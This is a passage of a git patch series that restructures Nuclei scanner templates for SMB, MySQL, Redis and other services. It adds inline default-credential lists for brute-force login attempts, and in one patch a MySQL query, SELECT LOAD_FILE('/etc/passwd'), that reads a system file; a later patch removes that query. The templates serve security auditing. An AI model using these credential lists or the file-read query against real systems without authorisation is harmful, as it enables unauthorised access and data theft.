a/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml similarity index 100% rename from javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml rename to javascript/enumeration/pop3/pop3-capabilities-enum.yaml diff --git a/javascript/enumeration/smb/rsync/rsync-version.yaml b/javascript/enumeration/rsync/rsync-version.yaml similarity index 100% rename from javascript/enumeration/smb/rsync/rsync-version.yaml rename to javascript/enumeration/rsync/rsync-version.yaml From 6b47f70c5cc9a28a994039a31bd74ee9eaf1567a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 14 Mar 2024 15:42:01 +0530 Subject: [PATCH 07/13] SMB Version -FP fix --- javascript/enumeration/smb/smb-version-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index 863822b030..6ffa6c420d 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -17,6 +17,11 @@ javascript: let response = c.ConnectSMBInfoMode(Host, Port); Export(response); + matchers: + - type: dsl + dsl: + - "len(smb-version) != 0" + args: Host: "{{Host}}" Port: "445" From 07dd2d5c77d643b34f143d09328f6e307f53a236 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:09:27 +0530 Subject: [PATCH 08/13] Update smb-version-detect.yaml --- javascript/enumeration/smb/smb-version-detect.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index 6ffa6c420d..a9dcd34e00 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -17,15 +17,15 @@ javascript: let response = c.ConnectSMBInfoMode(Host, Port); Export(response); - matchers: - - type: dsl - dsl: - - "len(smb-version) != 0" - args: Host: "{{Host}}" Port: "445" + matchers: + - type: dsl + dsl: + - "len(smb-version) != 0" + extractors: - type: json name: smb-version From bd67746687456afe1a00ece676c01d8250a46b5e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:22:59 +0530 Subject: [PATCH 09/13] struct -update --- javascript/{ => enumeration}/mysql/mysql-db-enum.yaml | 0 javascript/{ => enumeration}/mysql/mysql-default-login.yaml | 0 .../{network => enumeration}/mysql/mysql-show-databases.yaml | 0 javascript/{ => enumeration}/mysql/mysql-show-variables.yaml | 0 javascript/{ => enumeration}/mysql/mysql-user-enum.yaml | 0 javascript/{network => enumeration}/redis/redis-info.yaml | 0 javascript/{network => enumeration}/redis/redis-require-auth.yaml | 0 javascript/{network => enumeration}/smb/smb2-server-time.yaml | 0 .../{network => misconfiguration}/mysql/mysql-empty-password.yaml | 0 9 files changed, 0 insertions(+), 0 deletions(-) rename javascript/{ => enumeration}/mysql/mysql-db-enum.yaml (100%) rename javascript/{ => enumeration}/mysql/mysql-default-login.yaml (100%) rename javascript/{network => enumeration}/mysql/mysql-show-databases.yaml (100%) rename javascript/{ => enumeration}/mysql/mysql-show-variables.yaml (100%) rename javascript/{ => enumeration}/mysql/mysql-user-enum.yaml (100%) rename javascript/{network => enumeration}/redis/redis-info.yaml (100%) rename javascript/{network => enumeration}/redis/redis-require-auth.yaml (100%) rename javascript/{network => enumeration}/smb/smb2-server-time.yaml (100%) rename javascript/{network => misconfiguration}/mysql/mysql-empty-password.yaml (100%) diff --git a/javascript/mysql/mysql-db-enum.yaml b/javascript/enumeration/mysql/mysql-db-enum.yaml similarity index 100% rename from javascript/mysql/mysql-db-enum.yaml rename to javascript/enumeration/mysql/mysql-db-enum.yaml diff --git a/javascript/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml similarity index 100% rename from javascript/mysql/mysql-default-login.yaml rename to javascript/enumeration/mysql/mysql-default-login.yaml diff --git a/javascript/network/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml similarity index 100% rename from javascript/network/mysql/mysql-show-databases.yaml rename to javascript/enumeration/mysql/mysql-show-databases.yaml diff --git a/javascript/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml similarity index 100% rename from javascript/mysql/mysql-show-variables.yaml rename to javascript/enumeration/mysql/mysql-show-variables.yaml diff --git a/javascript/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml similarity index 100% rename from javascript/mysql/mysql-user-enum.yaml rename to javascript/enumeration/mysql/mysql-user-enum.yaml diff --git a/javascript/network/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml similarity index 100% rename from javascript/network/redis/redis-info.yaml rename to javascript/enumeration/redis/redis-info.yaml diff --git a/javascript/network/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml similarity index 100% rename from javascript/network/redis/redis-require-auth.yaml rename to javascript/enumeration/redis/redis-require-auth.yaml diff --git a/javascript/network/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml similarity index 100% rename from javascript/network/smb/smb2-server-time.yaml rename to javascript/enumeration/smb/smb2-server-time.yaml diff --git a/javascript/network/mysql/mysql-empty-password.yaml b/javascript/misconfiguration/mysql/mysql-empty-password.yaml similarity index 100% rename from javascript/network/mysql/mysql-empty-password.yaml rename to javascript/misconfiguration/mysql/mysql-empty-password.yaml From a2233701908186e5394aaf402a0bca6238d67ccf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:48:12 +0530 Subject: [PATCH 10/13] minor changes --- javascript/enumeration/smb/smb-default-creds.yaml | 2 +- javascript/enumeration/smb/smb-enum-domains.yaml | 2 +- javascript/enumeration/smb/smb-os-detect.yaml | 2 +- javascript/enumeration/smb/smb-version-detect.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml index 3a33b9ab79..325a599d14 100644 --- a/javascript/enumeration/smb/smb-default-creds.yaml +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -16,7 +16,7 @@ info: javascript: - code: | var m = require("nuclei/smb"); - var c = m.SMBClient(); + var c = new m.SMBClient(); var response = c.ListShares(Host, Port, User, Pass); response; diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index 31290a3afe..39c928c9f5 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -17,7 +17,7 @@ info: javascript: - code: | var m = require("nuclei/smb"); - var c = m.SMBClient(); + var c = new m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); Export(response); diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml index 180b7cdd54..deb6aa604f 100644 --- a/javascript/enumeration/smb/smb-os-detect.yaml +++ b/javascript/enumeration/smb/smb-os-detect.yaml @@ -15,7 +15,7 @@ info: javascript: - code: | var m = require("nuclei/smb"); - var c = m.SMBClient(); + var c = new m.SMBClient(); var response = c.ListSMBv2Metadata(Host, Port); if (response.OSVersion === "6.3.9600") { osInfo = "Windows 8.1"; diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index a9dcd34e00..6bd0d74f77 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -13,7 +13,7 @@ info: javascript: - code: | let m = require("nuclei/smb"); - let c = m.SMBClient(); + let c = new m.SMBClient(); let response = c.ConnectSMBInfoMode(Host, Port); Export(response); From f31b32622b15ab68af4e41e2b9fd0745ce5ceb8f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 22 Mar 2024 15:40:06 +0530 Subject: [PATCH 11/13] mysql -update --- javascript/audit/mysql/mysql-load-file.yaml | 22 +++++++--- .../enumeration/mysql/mysql-db-enum.yaml | 44 ------------------- javascript/enumeration/mysql/mysql-info.yaml | 36 +++++++++++++++ .../mysql/mysql-show-databases.yaml | 24 ++++++---- .../mysql/mysql-show-variables.yaml | 24 ++++++---- .../enumeration/mysql/mysql-user-enum.yaml | 24 ++++++---- 6 files changed, 99 insertions(+), 75 deletions(-) delete mode 100644 javascript/enumeration/mysql/mysql-db-enum.yaml create mode 100644 javascript/enumeration/mysql/mysql-info.yaml diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index f4fed479ce..5f61527c6e 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -10,7 +10,7 @@ info: metadata: shodan-query: port:3306 verified: true - tags: js,mysql,network,audit,fuzz + tags: js,mysql,network,audit javascript: - code: | @@ -26,12 +26,20 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb stop-at-first-match: true matchers-condition: and @@ -48,4 +56,4 @@ javascript: - type: json part: response json: - - .Rows[] + - .Rows[] \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-db-enum.yaml b/javascript/enumeration/mysql/mysql-db-enum.yaml deleted file mode 100644 index 909ef0b518..0000000000 --- a/javascript/enumeration/mysql/mysql-db-enum.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: mysql-db-enum - -info: - name: MySQL Database - Enumeration - author: pussycat0x - severity: high - metadata: - shodan-query: port:3306 - tags: js,mssql,network,enum,fuzz - -javascript: - - code: | - let m = require('nuclei/mysql'); - let c = m.MySQLClient(); - let result = c.ConnectWithDB(Host,Port,User,Pass,dbName); - result; - - args: - Host: "{{Host}}" - Port: "3306" - dbName: "{{db}}" - User: "{{usernames}}" - Pass: "{{passwords}}" - - threads: 10 - attack: pitchfork - - stop-at-first-match: true - - payloads: - db: - - information_schema - - performance_schema - - mysql - - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - - matchers: - - type: dsl - dsl: - - "response == true" - - "success == true" - condition: and diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml new file mode 100644 index 0000000000..5d90a8a098 --- /dev/null +++ b/javascript/enumeration/mysql/mysql-info.yaml @@ -0,0 +1,36 @@ +id: mysql-info + +info: + name: MySQL Info - Enumeration + author: pussycat0x + severity: info + description: | + Connects to a MySQL server and prints information such as the protocol and version numbers + reference: + - https://nmap.org/nsedoc/scripts/mysql-info.html + metadata: + shodan-query: port:3306 + tags: js,mssql,network + +javascript: + - code: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + var response = c.FingerprintMySQL(Host,Port); + Export(response); + + args: + Host: "{{Host}}" + Port: "3306" + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + json: + - '"Version: "+ .Version ' + - '"TLS "+ .TLS' + - '"Transport: "+ .Transport ' \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml index f45037c2d4..adcbf36d29 100644 --- a/javascript/enumeration/mysql/mysql-show-databases.yaml +++ b/javascript/enumeration/mysql/mysql-show-databases.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: port:3306 verified: true - tags: js,mysql,network,fuzz + tags: js,mysql,network,enum javascript: - code: | @@ -25,14 +25,22 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb + stop-at-first-match: true matchers: - type: dsl dsl: @@ -42,4 +50,4 @@ javascript: - type: json part: response json: - - .Rows[] | .Database + - .Rows[] | .Database \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml index 6d3b05cbd1..67c7828345 100644 --- a/javascript/enumeration/mysql/mysql-show-variables.yaml +++ b/javascript/enumeration/mysql/mysql-show-variables.yaml @@ -9,7 +9,7 @@ info: - https://nmap.org/nsedoc/scripts/mysql-variables.html metadata: shodan-query: port:3306 - tags: js,mysql,network,fuzz + tags: js,mysql,network,enum javascript: - code: | @@ -25,14 +25,22 @@ javascript: Pass: "{{passwords}}" Query: "show variables;" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb + stop-at-first-match: true matchers: - type: dsl dsl: @@ -42,4 +50,4 @@ javascript: - type: json part: response json: - - '.Rows[].Variable_name' + - '.Rows[].Variable_name' \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml index 11e39ecd2b..a2ea283790 100644 --- a/javascript/enumeration/mysql/mysql-user-enum.yaml +++ b/javascript/enumeration/mysql/mysql-user-enum.yaml @@ -11,7 +11,7 @@ info: metadata: shodan-query: port:3306 verified: true - tags: js,mysql,network,enum,fuzz + tags: js,mysql,network,enum javascript: - code: | @@ -27,14 +27,22 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb + stop-at-first-match: true matchers: - type: dsl dsl: @@ -44,4 +52,4 @@ javascript: - type: json part: response json: - - '.Rows[].user' + - '.Rows[].user' \ No newline at end of file From b151c4a41f692c8fda0529eb471f3b54f0098644 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 22 Mar 2024 19:41:12 +0530 Subject: [PATCH 12/13] mysql creds -update --- javascript/audit/mysql/mysql-load-file.yaml | 8 +++---- .../mysql/mysql-default-login.yaml | 23 +++++++++++++++---- .../mysql/mysql-show-databases.yaml | 8 +++---- .../mysql/mysql-show-variables.yaml | 8 +++---- .../enumeration/mysql/mysql-user-enum.yaml | 8 +++---- 5 files changed, 30 insertions(+), 25 deletions(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index 5f61527c6e..cede045998 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -28,17 +28,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index a285e9e135..28c2aad48a 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -28,13 +28,26 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork + args: + Host: "{{Host}}" + Port: "3306" + Query: SELECT LOAD_FILE('/etc/passwd') + User: "{{usernames}}" + Pass: "{{passwords}}" payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - root + - admin + - mysql + - test + passwords: + - root + - admin + - mysql + - test + - + attack: clusterbomb matchers: - type: dsl diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml index adcbf36d29..b18a97008a 100644 --- a/javascript/enumeration/mysql/mysql-show-databases.yaml +++ b/javascript/enumeration/mysql/mysql-show-databases.yaml @@ -27,17 +27,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml index 67c7828345..727d251ba8 100644 --- a/javascript/enumeration/mysql/mysql-show-variables.yaml +++ b/javascript/enumeration/mysql/mysql-show-variables.yaml @@ -27,17 +27,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml index a2ea283790..afc2f3b26c 100644 --- a/javascript/enumeration/mysql/mysql-user-enum.yaml +++ b/javascript/enumeration/mysql/mysql-user-enum.yaml @@ -29,17 +29,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true From 99f945de30a25303089c23177df7f93247c893e6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 22 Mar 2024 19:45:15 +0530 Subject: [PATCH 13/13] Update mysql-default-login.yaml --- javascript/enumeration/mysql/mysql-default-login.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 28c2aad48a..f5b5535048 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -28,13 +28,6 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - args: - Host: "{{Host}}" - Port: "3306" - Query: SELECT LOAD_FILE('/etc/passwd') - User: "{{usernames}}" - Pass: "{{passwords}}" - payloads: usernames: - root